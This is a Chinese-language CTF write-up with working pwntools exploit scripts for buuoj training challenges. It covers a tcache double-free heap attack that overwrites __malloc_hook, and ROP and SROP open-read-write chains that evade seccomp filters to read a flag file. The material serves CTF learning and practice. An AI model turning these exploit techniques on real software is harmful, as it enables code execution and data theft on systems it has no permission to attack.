

本文编写于 255 天前,最后修改于 93 天前,其中某些信息可能已经过时。

easyTHeap

分析:可以add七个chunk,大小在0~0x100,delete三次

存在uaf漏洞,在delete函数里free掉heap_addr,将size_addr置为0

这道题的难点在于只能delete三次,且不可edit已经free掉的chunk

所以只能攻击 tcache，后面需要 realloc_hook 调节栈帧

提醒!!!ubuntu16和ubuntu18算出来的偏移不一样...

尽量用libc_base = malloc_hook - libc.sym['__malloc_hook']这样算

from pwn import *
context.log_level = 'debug'   # dumps every byte sent/received on the tube; noisy but useful while developing
debug = 0                     # 0 = talk to the remote instance, 1 = run ./easyheap locally

elf = ELF('easyheap')

if debug:
    sh = process('./easyheap')
    libc = ELF('libc.so.6')
else:
    sh = remote('node3.buuoj.cn',25625)
    # Same libc file in both branches: it must match the remote build, otherwise
    # the raw offsets used below are wrong (see the ubuntu16/18 warning above).
    libc = ELF('libc.so.6')

def add(size):
    """Menu option 1: allocate a chunk, answering the size prompt with *size*.

    The size is sent without a trailing newline, exactly as the program expects.
    """
    choice = '1'
    sh.sendlineafter('choice: ', choice)
    sh.sendafter('size?', str(size))

def show(idx):
    """Menu option 3: ask the program to print slot *idx*; the caller consumes the output."""
    sh.sendlineafter('choice: ', '3')
    sh.sendlineafter('idx?', str(idx))
def edit(idx,data):
    """Menu option 2: overwrite slot *idx* with *data* (sent raw, no newline).

    ``str(data)`` is a no-op for the ``p64()`` strings this script passes in;
    it only matters for non-string arguments.
    """
    sh.sendlineafter('choice: ', '2')
    sh.sendlineafter('idx?', str(idx))
    sh.sendafter('content:', str(data))
def delete(idx):
    """Menu option 4: free slot *idx*.

    The writeup notes the program frees the chunk but only zeroes its size
    field, and that only three calls are allowed per run.
    """
    sh.sendlineafter('choice: ', '4')
    sh.sendlineafter('idx?', str(idx))

# Only three delete() calls are available; the sequence below uses all three
# (slot 1 twice, slot 0 once).
add(0x88)#0
add(0xf8)#1
delete(1)
delete(1)   # second free of slot 1 -- relies on the UAF in delete() described above
show(1)
# 6-byte address leaked through show(1); 0x2e0 is an environment-specific
# offset (see the ubuntu16/18 warning above).
heap_addr = u64(sh.recv(6).ljust(8,'\x00')) - 0x2e0
add(0xf8)#2
edit(2,p64(heap_addr))
add(0xf8)#3
edit(3,'a')
add(0xf8)#4
edit(4,p64(0xFFFFFFFFFFFFFFFF)*4)   # first four qwords of slot 4 set to -1
delete(0)
show(0)
#gdb.attach(sh)
# Raw libc offset; the note above recommends deriving libc_base from
# __malloc_hook instead, since this value differs between distro builds.
libc_addr = u64(sh.recv(6).ljust(8,'\x00')) - 0x3afca0  
log.success('libc_addr: '+hex(libc_addr))
# 0x3b0c28 and 0x10a38c below are build-specific libc offsets, not symbols --
# TODO verify them against the target libc before reuse.
edit(4,p64(0x0000010000000000)+p64(0)*12+p64(libc_addr+0x3b0c28))
add(0x68)#5
edit(5,p64(0x10a38c+libc_addr)+p64(libc_addr+libc.symbols['__libc_realloc']+4))
#gdb.attach(sh)
add(0x10)#6
sh.interactive()

simpleHeap

单字节溢出,不浪费时间做了

warmup

沙箱的题,先看一下禁用了哪些函数

 line  CODE  JT   JF      K
=================================
 0000: 0x20 0x00 0x00 0x00000004  A = arch
 0001: 0x15 0x00 0x09 0xc000003e  if (A != ARCH_X86_64) goto 0011
 0002: 0x20 0x00 0x00 0x00000000  A = sys_number
 0003: 0x35 0x07 0x00 0x40000000  if (A >= 0x40000000) goto 0011
 0004: 0x15 0x06 0x00 0x0000003b  if (A == execve) goto 0011
 0005: 0x15 0x00 0x04 0x00000001  if (A != write) goto 0010
 0006: 0x20 0x00 0x00 0x00000024  A = count >> 32 # write(fd, buf, count)
 0007: 0x15 0x00 0x02 0x00000000  if (A != 0x0) goto 0010
 0008: 0x20 0x00 0x00 0x00000020  A = count # write(fd, buf, count)
 0009: 0x15 0x01 0x00 0x00000010  if (A == 0x10) goto 0011
 0010: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0011: 0x06 0x00 0x00 0x00000000  return KILL

这道题需要用orw来解决

open → read → write/puts

刚开始需要在一个地址写入flag的路径,然后才能读

from pwn import *
context.log_level = 'debug'
debug = 0   # 0 = remote instance, 1 = local ./pwn using the binary's own libc
elf = ELF('pwn')

if debug:
    sh = process('./pwn')
    libc = elf.libc
else:
    sh = remote('node3.buuoj.cn',26995)
    libc = ELF('libc-2.23.so')
sh.recvuntil('Here is my gift: ')
# The program prints the address of puts ("0x" + 12 hex digits = 14 chars).
libc_base = int(sh.recv(14),16) - libc.symbols['puts']
log.success('libc_base: '+hex(libc_base))

# Gadget offsets are specific to libc-2.23.so.
pop_rdi_ret=libc_base+0x21102
pop_rsi_ret=libc_base+0x202e8
pop_rdx_ret=libc_base+0x1b92
pop_rax_ret=libc_base+0x33544
buf = libc_base+libc.symbols['__free_hook']   # writable libc address used as scratch space for the path and file data

open_addr=libc_base+libc.symbols['open']
read_addr=libc_base+libc.symbols['read']
# Misnamed: this is write(), not puts. The seccomp filter above only kills
# write() when count == 0x10; the chain uses 0x100, so that rule does not match.
puts_addr=libc_base+libc.symbols['write']

# ROP chain: read(0, buf, 0x30) -> open(buf, 0, 0) -> read(3, buf, 0x100) -> write(1, buf, 0x100).
# The leading p64(0) appears to be consumed by the pop rdi gadget the
# overflow returns into (see the 'name?' send below) -- confirm under a debugger.
payload = p64(0)+p64(pop_rsi_ret)+p64(buf)+p64(pop_rdx_ret)+p64(0x30)+p64(read_addr)
payload += p64(pop_rdi_ret)+p64(buf)+p64(pop_rsi_ret)+p64(0)+p64(pop_rdx_ret)+p64(0)+p64(open_addr)
payload += p64(pop_rdi_ret)+p64(3)+p64(pop_rsi_ret)+p64(buf)+p64(pop_rdx_ret)+p64(0x100)+p64(read_addr)
payload += p64(pop_rdi_ret)+p64(1)+p64(pop_rsi_ret)+p64(buf)+p64(pop_rdx_ret)+p64(0x100)+p64(puts_addr)

sh.recvuntil('something: ')
sh.send(payload)
sh.recvuntil('name?')
sh.send('a'*0x78+p64(pop_rdi_ret))   # 0x78 bytes of padding, then the return address
pause()
sh.send('flag\x00')   # consumed by the first read(0, buf, 0x30): the path handed to open()
sh.interactive()

babybabypwn

seccomp的题

$ seccomp-tools dump ./vn_pwn_babybabypwn_1 
 line  CODE  JT   JF      K
=================================
 0000: 0x20 0x00 0x00 0x00000004  A = arch
 0001: 0x15 0x00 0x0d 0xc000003e  if (A != ARCH_X86_64) goto 0015
 0002: 0x20 0x00 0x00 0x00000000  A = sys_number
 0003: 0x35 0x00 0x01 0x40000000  if (A < 0x40000000) goto 0005
 0004: 0x15 0x00 0x0a 0xffffffff  if (A != 0xffffffff) goto 0015
 0005: 0x15 0x09 0x00 0x00000009  if (A == mmap) goto 0015
 0006: 0x15 0x08 0x00 0x0000000a  if (A == mprotect) goto 0015
 0007: 0x15 0x07 0x00 0x00000029  if (A == socket) goto 0015
 0008: 0x15 0x06 0x00 0x0000002a  if (A == connect) goto 0015
 0009: 0x15 0x05 0x00 0x00000031  if (A == bind) goto 0015
 0010: 0x15 0x04 0x00 0x00000032  if (A == listen) goto 0015
 0011: 0x15 0x03 0x00 0x00000038  if (A == clone) goto 0015
 0012: 0x15 0x02 0x00 0x00000039  if (A == fork) goto 0015
 0013: 0x15 0x01 0x00 0x0000003b  if (A == execve) goto 0015
 0014: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0015: 0x06 0x00 0x00 0x00000000  return KILL

SROP 的题，自己的 wp 跑不通，参考别人的 wp

https://blog.csdn.net/weixin_44145820/article/details/105246356

from pwn import *
context.log_level = 'debug'
r = remote("node3.buuoj.cn",  28896)
context(arch = 'amd64', os= 'linux')   # SigreturnFrame() below depends on the arch being set
print r.recvuntil("Here is my gift: 0x")
libc = ELF("libc-2.23.so")
puts_addr = int(r.recvuntil('\n').strip(), 16)
libc_base = puts_addr - libc.symbols['puts']
libc.address = libc_base   # from here on libc.sym/libc.symbols give absolute addresses
success("libc_base:" + hex(libc_base))
buf = libc.sym['environ']   # writable libc address (absolute, see libc.address above) used as scratch space
# Gadget offsets are specific to libc-2.23.so.
pop_rdi = 0x021102 + libc_base
pop_rdx_rsi = 0x1150c9 + libc_base
pop_rdx = 0x001b92 + libc_base
syscall = 0x0bc375 + libc_base

# SROP frame: read(0, buf, 0x200), then continue with rsp = buf + 8.
frame = SigreturnFrame()
frame.rax = constants.SYS_read
frame.rsp = buf + 8
frame.rdi = 0
frame.rsi = buf
frame.rdx = 0x200
frame.rip = syscall
# The first 8 bytes of the frame are dropped -- presumably the program
# supplies them itself; confirm against the binary.
payload = str(frame)[8:]
r.sendline(payload)

# Data read into buf: 'flag\0' padded to 8 bytes (the path), followed by the
# chain that rsp now points at: open(buf, 0, 0) -> read(3, buf, 0x100) -> write(1, buf, 0x100).
payload = 'flag' + '\x00' * 4 + p64(pop_rdi) + p64(buf) + p64(pop_rdx_rsi) + p64(0) * 2 + p64(libc.symbols['open'])
payload += p64(pop_rdi) + p64(3) + p64(pop_rdx_rsi) + p64(0x100) + p64(buf) + p64(libc.symbols['read'])
payload += p64(pop_rdi) + p64(1) + p64(pop_rdx_rsi) + p64(0x100) + p64(buf) + p64(libc.symbols['write'])
r.sendline(payload)
r.interactive()

http://www.starssgo.top/2020/03/04/%C2%96%C2%96%C2%96%C2%96-V-N2020-%E5%85%AC%E5%BC%80%E8%B5%9B-pwn/#babybabypwn

# -*- coding: utf-8 -*-
from pwn import *
from LibcSearcher import *   # not used anywhere below
context.log_level = 'debug'
context.arch = 'amd64'       # needed by asm() and SigreturnFrame() inside pwn()
p = 0   # tube handle; pwn() rebinds it through `global p`
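def pwn(ip,port,debug,flaag):
    """Drive the exploit against *flaag* and hand the tube over interactively.

    Args:
        ip, port: remote endpoint; only used when ``debug != 1``.
        debug: 1 runs *flaag* locally and attaches gdb; any other value
            connects to ``ip:port``.
        flaag: path of the target binary.

    Side effects:
        Rebinds the module-level tube ``p`` and does not return normally
        (it ends in ``p.interactive()``).

    Python 2 script: ``p64()`` returns ``str`` here, which is why byte
    payloads are concatenated with plain string literals.
    """
    elf = ELF(flaag)  # kept for its checksec printout; no symbols are read from it
    global p
    if(debug == 1):
        p = process(flaag)
        # Only attach the debugger to a local process. The original attached
        # unconditionally, which is meaningless for a remote tube.
        gdb.attach(p)
    else:
        p = remote(ip,port)
    p.recvuntil('0x')
    puts_addr=int(p.recv(12),16)
    # Host libc: every offset below is only correct when the target runs this
    # exact build (true for the local debug run; verify for a remote target).
    libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
    libcbase_addr=puts_addr-libc.symbols['puts']
    open_addr=libcbase_addr+libc.symbols['open']
    read_addr=libcbase_addr+libc.symbols['read']
    free_hook=libcbase_addr+libc.symbols['__free_hook']
    # next() rather than .next(): works on both Python 2 and Python 3 iterators.
    pop_rdi_ret=libcbase_addr+next(libc.search(asm("pop rdi\nret")))
    pop_rdx_ret=libcbase_addr+next(libc.search(asm("pop rdx\nret")))
    pop_rsi_ret=libcbase_addr+next(libc.search(asm("pop rsi\nret")))
    # SROP frame: read(0, free_hook, 0x2000), then continue with rsp = free_hook.
    frame = SigreturnFrame()
    frame.rdi = 0
    frame.rax = 0
    frame.rsi = free_hook
    frame.rdx = 0x2000
    frame.rsp = free_hook
    frame.rip = libcbase_addr + 0x00000000000bc375 #: syscall; ret; 
    p.sendafter("magic message: ",str(frame)[8:])
    # Chain read into free_hook: open(path, 72) -> read(3, free_hook+0x100, 0x100) -> puts(free_hook+0x100).
    # The three lines total 0x78 bytes, so 'flag\x00' lands exactly at free_hook+0x78.
    payload=p64(pop_rdi_ret)+p64(free_hook+0x78)+p64(pop_rsi_ret)+p64(72)+p64(open_addr)
    payload+=p64(pop_rsi_ret)+p64(free_hook+0x100)+p64(pop_rdi_ret)+p64(3)+p64(pop_rdx_ret)+p64(0x100)+p64(read_addr)
    payload+=p64(pop_rdi_ret)+p64(free_hook+0x100)+p64(puts_addr)+'flag\x00'
    # Use the pwntools logger like the rest of the page instead of a py2-only print statement.
    log.info("len=>%s" % hex(len(payload)))
    p.sendline(payload)
    p.interactive()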
if __name__ == '__main__':
    # debug=1: run ./babypwn locally under gdb; ip/port are ignored on that path.
    pwn('buuoj.cn',25638,1,'./babypwn')